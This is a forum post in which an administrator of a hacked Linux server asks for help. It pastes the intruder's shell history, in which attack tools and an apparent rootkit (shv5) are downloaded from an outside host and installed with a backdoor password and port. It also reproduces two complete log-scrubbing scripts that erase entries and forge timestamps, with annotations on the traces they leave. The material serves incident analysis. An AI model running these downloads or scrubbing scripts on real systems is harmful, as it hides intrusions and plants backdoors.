哭,服务器今天被人黑了,请教下大家有什么办法?
这是有关记录:
exit
# Shell history recovered from the compromised host: the intruder's commands
# in the order they were typed, typos included. Kept verbatim as evidence.
# Orientation: working directory, processes owned by root, current uid/gid.
pwd
ps -U root
ps -U root
id
# Tool download. The first archive name (sbh5) looks like a mistyped shv5 --
# presumably only the second fetch succeeded; confirm against proxy/DNS logs.
# Indicators to search for on other hosts: the download host test4.go.ro and
# the archive name shv5.tar.tar.
wget test4.go.ro/sbh5.tar.tar
wget test4.go.ro/shv5.tar.tar
tar zxvf shv5.tar.tar
cd shv5
# "setuop" is a mistyped "setup"; the real invocation follows.
./setuop
# NOTE(review): "shv5" matches the name of a publicly documented Linux rootkit
# kit whose installer takes a password and a port for a backdoored SSH service
# and replaces common system utilities. If that is what ran here, "muiema" and
# 54323 are that password and port -- TODO confirm by checking for a listener
# on 54323 from outside the host. Treat local ps/ls/netstat output as
# untrusted and examine the disk from known-good media.
./setup muiema 54323
cd ..
id
ls
# ./led is an unidentified binary in the parent directory. The "id" calls
# around it suggest the operator was checking whether privileges had changed
# (presumably a local privilege-escalation attempt) -- recover the file and
# analyze it offline.
./led
./led
id
cd shv5
# Repeated installer runs with "id" in between: the earlier attempts
# apparently did not have the desired effect.
./setup muiema 54323
id
./setup muiema 54323
ls -alp
# Everything in the extracted directory is made executable, then the
# installer is run a final time.
chmod +x *
./setup muiema 54323
_____________________
hide
_________
#!/bin/bash
# Log-scrubbing script left behind by the intruder (labelled "hide" on this
# page). Reproduced unchanged; the comments describe what it does and which
# traces it leaves for an investigator.
#
# Argument: $1 - string to purge; every line containing it is dropped from
#           each log listed below.
# Per log file: filter with "grep -v" into /tmp/<name>.xz (plain text despite
# the .xz suffix), copy the original's access/modification times onto the
# copy with "touch -acmr", then move the copy over the original.
#
# Traces this leaves:
#  - "mv" replaces the path with a different file, so the inode number
#    changes, and the change time (ctime), which touch cannot set, reflects
#    the moment of tampering even though atime/mtime look untouched.
#  - The replacement is created by whoever ran the script under their umask,
#    so owner/mode may differ from what the logging daemon normally produces.
#  - Nothing here tells the logging daemon to reopen its files; presumably it
#    keeps writing to the old, now-unlinked file, so the visible logs stop
#    growing (look for open-but-deleted files held by the daemon).
#  - Logs forwarded to a remote collector are unaffected and can be compared
#    against the local copies to find the removed lines.
echo " Linux Hider v2.0 by mave"
echo " enhanced by me! "
echo "[+] Removing $1 from the logs........ ."
echo ""
# Mail log.
if [ -f /var/log/maillog ]; then
cat /var/log/maillog | grep -v $1 > /tmp/maillog.xz
# -r copies timestamps from the original; -a/-m select atime and mtime,
# -c avoids creating the target if it is missing.
touch -acmr /var/log/maillog /tmp/maillog.xz
mv -f /tmp/maillog.xz /var/log/maillog
echo "[+] /var/log/maillog ... "
echo ""
fi
# General system log.
if [ -f /var/log/messages ]; then
cat /var/log/messages | grep -v $1 > /tmp/messages.xz
touch -acmr /var/log/messages /tmp/messages.xz
mv -f /tmp/messages.xz /var/log/messages
echo "[+] /var/log/messages... "
sleep 2
echo ""
fi
# Authentication log.
if [ -f /var/log/secure ]; then
cat /var/log/secure | grep -v $1 > /tmp/secure.xz
touch -acmr /var/log/secure /tmp/secure.xz
mv -f /tmp/secure.xz /var/log/secure
echo "[+] /var/log/secure ... "
echo ""
fi
# FTP transfer log.
if [ -f /var/log/xferlog ]; then
cat /var/log/xferlog | grep -v $1 > /tmp/xferlog.xz
touch -acmr /var/log/xferlog /tmp/xferlog.xz
mv -f /tmp/xferlog.xz /var/log/xferlog
sleep 2
echo "[+] /var/log/xferlog ... "
echo ""
fi
# utmp, lastlog and wtmp are binary record files, not line-oriented text.
# NOTE(review): a line-based grep over them presumably damages the record
# layout rather than cleanly removing entries -- unreadable or empty output
# from who/last/lastlog after an incident is itself a tampering signal.
if [ -f /var/run/utmp ]; then
cat /var/run/utmp | grep -v $1 > /tmp/utmp.xz
touch -acmr /var/run/utmp /tmp/utmp.xz
mv -f /tmp/utmp.xz /var/run/utmp
echo "[+] /var/run/utmp ... "
echo ""
fi
if [ -f /var/log/lastlog ]; then
cat /var/log/lastlog |grep -v $1 > /tmp/lastlog.xz
touch -acmr /var/log/lastlog /tmp/lastlog.xz
mv -f /tmp/lastlog.xz /var/log/lastlog
sleep 2
echo "[+] /var/log/lastlog ... "
echo ""
fi
if [ -f /var/log/wtmp ]; then
cat /var/log/wtmp |grep -v $1 > /tmp/wtmp.xz
touch -acmr /var/log/wtmp /tmp/wtmp.xz
mv -f /tmp/wtmp.xz /var/log/wtmp
echo "[+] /var/log/wtmp ... "
echo ""
fi
# Removes every *.xz in /tmp, not only the files created above.
rm -f /tmp/*.xz
echo " * m i s s i o na c c o m p l i s h e d *"
echo ""
sleep 2
echo " p.h.e.e.rS.H.c.r.e.w"
echo ""
sleep 5
# Always exits with status 1, including after a complete run.
exit 1
__________________
shsb
________
#!/bin/bash
#
# sauber - by socked
#
# Usage: sauber <string>
#
# Second log-scrubbing script found on the host (labelled "shsb" on this
# page). Reproduced unchanged; the comments describe behaviour and the traces
# it leaves.
#
# Argument: $1 - string to purge; lines containing it are removed from every
#           plain file directly under /var/log (see the WERD filter below).
#
# Traces this leaves:
#  - Each processed log is replaced through a scratch file named "new" in the
#    current working directory, so all of them get a new inode and a ctime
#    clustered around the run, while "touch -r" restores only the timestamps
#    it can set.
#  - syslogd receives SIGHUP at the end; NOTE(review): many syslog daemons
#    record a restart/reload line when signalled -- check for one that no
#    administrator action explains.
#  - lastlog, utmp and wtmp are deliberately skipped, so login records may
#    still hold entries that the text logs no longer show.
#
# Colour codes for the banner. NOTE(review): these look like ANSI sequences
# whose leading escape byte was lost when the script was pasted -- confirm
# against a recovered copy of the file.
BLK='[1;30m'
RED='[1;31m'
GRN='[1;32m'
YEL='[1;33m'
BLU='[1;34m'
MAG='[1;35m'
CYN='[1;36m'
WHI='[1;37m'
DRED='[0;31m'
DGRN='[0;32m'
DYEL='[0;33m'
DBLU='[0;34m'
DMAG='[0;35m'
DCYN='[0;36m'
DWHI='[0;37m'
RES='[0m'
echo "${BLK}* ${WHI}sauber ${DWHI}by ${WHI}s${BLU}o${DBLU}ck${BLK}ed [${DWHI}07${BLK}.${DWHI}27${BLK}.${DWHI}97${BLK}]${RES}"
# Exactly one argument is required; otherwise print usage and stop.
if [ $# != 1 ]
then
echo "${BLK}* ${DWHI}Usage${WHI}: "`basename $0`" <${DWHI}string${WHI}>${RES}"
echo " "
exit
fi
echo "${BLK}*${RES}"
echo "${BLK}* ${DWHI}Cleaning logs.. This may take a bit depending on the size of the logs.${RES}"
# Target list: "ls -F" marks directories (/), executables (*) and symlinks
# (@); those are filtered out together with archives (.tgz/.gz/.tar) and the
# binary login records (lastlog, utmp, wtmp).
WERD=$(/bin/ls -F /var/log | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp" | grep -v "wtmp" | grep -v "@")
for fil in $WERD
do
# Line count before filtering, for the progress message.
line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}...${RES}"
# Filter into ./new, copy the original's timestamps, replace the original.
grep -v $1 /var/log/$fil > new
touch -r /var/log/$fil new
mv -f new /var/log/$fil
# Line count after filtering; the difference is reported as lines removed.
newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
let linedel=$(($line-$newline))
echo "${WHI}$linedel ${DWHI}lines removed!${RES}"
done
# Signal syslogd so it reopens the replaced log files.
killall -HUP syslogd
echo "${BLK}* ${DWHI}Alles sauber mein Meister !'Q%&@$! ${RES}"
谁能帮我上服务器看看还有没有后门呢??